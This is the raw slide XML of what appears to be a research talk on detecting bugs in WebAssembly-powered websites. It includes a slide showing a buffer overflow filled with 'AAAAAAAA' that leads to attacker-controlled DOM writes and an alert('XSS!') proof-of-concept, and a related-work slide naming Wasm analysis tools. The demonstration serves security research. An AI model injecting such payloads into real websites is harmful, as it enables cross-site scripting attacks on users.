              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="1425"/>
                </a:lnSpc>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="6A9955"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  //...</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p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  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="9CDCFE"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="DCDCAA"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>writeToDom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(tag, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>img</a:t>
              </a:r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);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" b="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D4D4D4"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Grafik 15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E95254D5-8722-48E5-A971-7A1B09990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-101722" y="1252764"/>
              <a:ext cx="817091" cy="62801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F666AA5-D75A-19B5-479E-AC08C9CCD948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2792808" y="2010505"/>
            <a:ext cx="953102" cy="510261"/>
            <a:chOff x="3065317" y="4864318"/>
            <a:chExt cx="1124845" cy="611691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095B2C3-3497-A06F-A473-6FDB239A3F87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3065317" y="4879148"/>
              <a:ext cx="1124845" cy="5968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k 11" descr="Ein Bild, das Cartoon, Clipart, Kreativität enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6DA6B4-59C7-B333-13FC-0AA34A718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351028" y="4864318"/>
              <a:ext cx="605407" cy="590272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="https://cdn1.iconfinder.com/data/icons/large-glossy-icons/512/Spy.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0888E65-FF80-023C-65C0-B535C1278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36" y="1989627"/>
            <a:ext cx="700339" cy="71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4C454AB-CFF5-8D24-60D5-41DEC2E89A0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291383" y="2502899"/>
            <a:ext cx="0" cy="67437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 descr="Ein Bild, das Säugetier, Katze, Hauskatze, Kleine bis mittelgroße Katzen enthält.&#10;&#10;Automatisch generierte Beschreibung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2CC2564-799F-2F69-D940-61158513CD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394033" y="3340285"/>
            <a:ext cx="3507808" cy="2480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12473023-6F84-8517-2194-3369FE32D908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4859319" y="2070939"/>
            <a:ext cx="2905706" cy="3733486"/>
            <a:chOff x="4859319" y="2070939"/>
            <a:chExt cx="2905706" cy="3733486"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rechteck: abgerundete Ecken 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5A3A70-0E44-C2EA-E1C3-C58040263B6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5250069" y="2382615"/>
              <a:ext cx="2514956" cy="342181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33" name="Gruppieren 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0D7FAF7-4A71-1FC1-D197-562F88162627}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5456710" y="2584683"/>
              <a:ext cx="2083246" cy="3145558"/>
              <a:chOff x="9257603" y="606346"/>
              <a:chExt cx="2506222" cy="2883773"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Rechteck: abgerundete Ecken 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8164970-C632-FCAF-4608-92EBD9114BAA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9257603" y="606346"/>
                <a:ext cx="2506222" cy="2883773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feld 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56112003-0F21-9538-1C9E-6BEB6926EE6F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9719326" y="645659"/>
                <a:ext cx="1512154" cy="423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pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="Grafik 56" descr="Ein Bild, das Electric Blue (Farbe), Grafiken, Mond, Kreis enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B938270C-3D64-45B6-1F83-5075CB675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859319" y="2070939"/>
              <a:ext cx="702077" cy="702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54" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4371062F-7477-8E25-0929-0477A12C37B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706333" y="3177270"/>
            <a:ext cx="1584000" cy="43941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tag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FEB0458A-AB90-B8B9-7D2E-39B1C487A356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7295554" y="3396980"/>
            <a:ext cx="1098479" cy="1183431"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3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3EC90B0-ED6A-E533-517D-1003EF6954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4033" y="3879405"/>
            <a:ext cx="3621343" cy="112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3" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E6AE20C-1C73-38D0-0765-D3528F7822B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706333" y="4189351"/>
            <a:ext cx="1584000" cy="147121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err="1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image</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg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50" name="Grafik 49" descr="Ein Bild, das Grafiken, Logo, Schrift, Symbol enthält.&#10;&#10;Automatisch generierte Beschreibung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40D2F907-E1B8-BB6C-7E1D-B8AA3966B4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1248261" y="3060206"/>
            <a:ext cx="929449" cy="99275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A0CE93-8C1F-D357-A77E-C638B2F2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9CAB8E2-320D-68BB-B819-7C7D9B29A219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014706" y="2518181"/>
            <a:ext cx="1" cy="6331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4AA1FD95-99A5-C8A7-00AC-E2EDEF39DB85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1646639" y="5866204"/>
            <a:ext cx="2514956" cy="74097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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r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B46D743-F636-E584-D84B-1BE466867248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="458231" y="5524437"/>
            <a:ext cx="3089638" cy="32721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FC8284B-B955-21C2-991B-3FA5E509CDF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2655690" y="1917790"/>
            <a:ext cx="1595685" cy="699007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" name="Grafik 60" descr="Ein Bild, das Säugetier, Katze, Schnurrhaare, Kleine bis mittelgroße Katzen enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B5884EC-A594-9B0D-4B02-43A0C7B8D8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02" y="3198950"/>
            <a:ext cx="2582262" cy="277253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6" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{225EB9A2-BA2A-F83C-23D2-DDEAAF84EBA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706333" y="3616690"/>
            <a:ext cx="1584000" cy="573804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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F3121D-B7B3-7291-682E-B78E1AD56D8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5701112" y="3613350"/>
            <a:ext cx="1611194" cy="1478279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</a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="de-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AAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr sz="1400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" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D355AF-C255-FFB7-F21A-FCA003A54907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5701112" y="5097395"/>
            <a:ext cx="1611194" cy="59258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AAAA</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="C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" name="Google Shape;550;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DCEF322-6D5F-6647-5E4F-9B3F7C368261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5701112" y="3170981"/>
            <a:ext cx="1611194" cy="4423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rgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert(„XSS!“)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2" name="Sprechblase: rechteckig 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1951BD07-F877-44D6-2F12-5264BD4325B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6382491" y="1293549"/>
            <a:ext cx="3665086" cy="733614"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30990"/>
              <a:gd name="adj2" fmla="val 222315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tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx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lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is attacker controlled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> XSS!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
            </a:endParaRP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4F0BBB0A-4F98-982C-46D7-8D5513053C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3871766" y="3669610"/>
            <a:ext cx="953102" cy="510261"/>
            <a:chOff x="3065317" y="4864318"/>
            <a:chExt cx="1124845" cy="611691"/>
          </a:xfrm>
          <a:noFill/>
        </p:grpSpPr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1B59CB65-FCB1-E0E9-A369-F299DF81B1B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3065317" y="4879148"/>
              <a:ext cx="1124845" cy="59686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Grafik 68" descr="Ein Bild, das Cartoon, Clipart, Kreativität enthält.&#10;&#10;Automatisch generierte Beschreibung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFAF019-51D5-FD49-F094-63B25655F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3351028" y="4864318"/>
              <a:ext cx="605407" cy="590272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76" name="Gerade Verbindung mit Pfeil 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D45228-3965-39E4-E3F9-F7A4A226D85B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5349240" y="3060206"/>
            <a:ext cx="0" cy="227775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25 L 0.03385 0.31852 C 0.04102 0.33403 0.05156 0.34051 0.06289 0.34051 C 0.07578 0.34051 0.08581 0.33403 0.09297 0.31852 C 0.10456 0.2956 0.10677 0.09051 0.11836 0.06783 " pathEditMode="relative" rAng="0" ptsTypes="AAAAA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36 0.06783 L 0.19154 -0.06944 C 0.20664 -0.10023 0.22956 -0.11666 0.25365 -0.11666 C 0.28099 -0.11666 0.303 -0.10023 0.3181 -0.06944 C 0.34258 -0.02407 0.3082 0.08496 0.33294 0.13125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606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3" grpId="0" animBg="1"/>
      <p:bldP spid="63" grpId="1" animBg="1"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="0" animBg="1"/>
      <p:bldP spid="49" grpId="0" animBg="1"/>
      <p:bldP spid="66" grpId="0" animBg="1"/>
      <p:bldP spid="66" grpId="1" animBg="1"/>
      <p:bldP spid="62" grpId="0" animBg="1"/>
      <p:bldP spid="64" grpId="0" animBg="1"/>
      <p:bldP spid="5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3700E44-B827-9F16-07AA-24D21F02C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Related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t> Work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24676-F5F8-3BCA-311B-817D0394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ABC739-7142-AFFF-0950-CFE02DD0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6</a:t>
            </a:fld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53E97EB8-E403-54A8-F2A6-95D1714C4B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147637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dk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/>
              <a:t>WAFL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" kern="1200"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" kern="1200" err="1"/>
              <a:t>Haßler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" kern="1200"/>
              <a:t> et al., ROOTS’22] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" kern="120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C9653AF-7305-2676-FB6D-6D33B04667F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332422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dk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/>
              <a:t>FUZZM</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="0" kern="1200"/>
              <a:t>[Lehmann et al., 2022]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" kern="12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26E4E06E-33AE-DDFE-EF7C-C579D95F8186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517207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001">
            <a:schemeClr val="dk2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err="1"/>
              <a:t>Wasmati</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="1" kern="1200"/>
          </a:p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0" kern="1200"/>
              <a:t>[Brito et al., Computer and Security ‘22] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" kern="120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3AECEAC-BB1D-25A9-67CC-5D7BC3FB79C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701992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/>
              <a:t>Wasabi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200"/>
              <a:t>[Lehmann et al., ASPLOS ‘19]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B4A6D768-AE38-34AB-E3B9-3F575B6060C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8867775" y="1162870"/>
            <a:ext cx="1847850" cy="1847850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1847850"/>
              <a:gd name="connsiteY0" fmla="*/ 923925 h 1847850"/>
              <a:gd name="connsiteX1" fmla="*/ 923925 w 1847850"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1847850"/>
              <a:gd name="connsiteX2" fmla="*/ 1847850 w 1847850"/>
              <a:gd name="connsiteY2" fmla="*/ 923925 h 1847850"/>
              <a:gd name="connsiteX3" fmla="*/ 923925 w 1847850"/>
              <a:gd name="connsiteY3" fmla="*/ 1847850 h 1847850"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1847850"/>
              <a:gd name="connsiteY4" fmla="*/ 923925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0" y="923925"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="413655"/>
                  <a:pt x="413655" y="0"/>
                  <a:pt x="923925" y="0"/>
                </a:cubicBez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611" tIns="270611" rIns="270611" bIns="270611" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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 err="1"/>
              <a:t>TaintAssembly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" b="1" kern="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" kern="1200"/>
              <a:t>[Fu et al., 2018]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E98157-9F7D-A1AA-65ED-00BD991BEFB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828000" y="2940581"/>
            <a:ext cx="10515600" cy="85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700" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3700" b="1" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>suitable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to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detect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bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3700" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3700" b="1" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Wasm-powered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3700" b="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3700" b="1" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>websites</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="370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C81A26A-DB7B-2419-8844-42198A73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02143AB6-80AA-1626-0A17-B5AECF82B622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658868" y="4043819"/>
            <a:ext cx="3259670" cy="2246769"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY0" fmla="*/ 224677 h 2246769"/>
              <a:gd name="connsiteX1" fmla="*/ 224677 w 3259670"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2246769"/>
              <a:gd name="connsiteX2" fmla="*/ 3034993 w 3259670"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2246769"/>
              <a:gd name="connsiteX3" fmla="*/ 3259670 w 3259670"/>
              <a:gd name="connsiteY3" fmla="*/ 224677 h 2246769"/>
              <a:gd name="connsiteX4" fmla="*/ 3259670 w 3259670"/>
              <a:gd name="connsiteY4" fmla="*/ 2022092 h 2246769"/>
              <a:gd name="connsiteX5" fmla="*/ 3034993 w 3259670"/>
              <a:gd name="connsiteY5" fmla="*/ 2246769 h 2246769"/>
              <a:gd name="connsiteX6" fmla="*/ 224677 w 3259670"/>
              <a:gd name="connsiteY6" fmla="*/ 2246769 h 2246769"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY7" fmla="*/ 2022092 h 2246769"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 3259670"/>
              <a:gd name="connsiteY8" fmla="*/ 224677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670" h="2246769">
                <a:moveTo>
                  <a:pt x="0" y="224677"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="100591"/>
                  <a:pt x="100591" y="0"/>
                  <a:pt x="224677" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3034993" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3159079" y="0"/>
                  <a:pt x="3259670" y="100591"/>
                  <a:pt x="3259670" y="224677"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3259670" y="2022092"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3259670" y="2146178"/>
                  <a:pt x="3159079" y="2246769"/>
                  <a:pt x="3034993" y="2246769"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="224677" y="2246769"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="100591" y="2246769"/>
                  <a:pt x="0" y="2146178"/>
                  <a:pt x="0" y="2022092"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2246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536" tIns="191536" rIns="191536" bIns="191536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/>
              <a:t>Ignores the interaction between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1" kern="1200" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
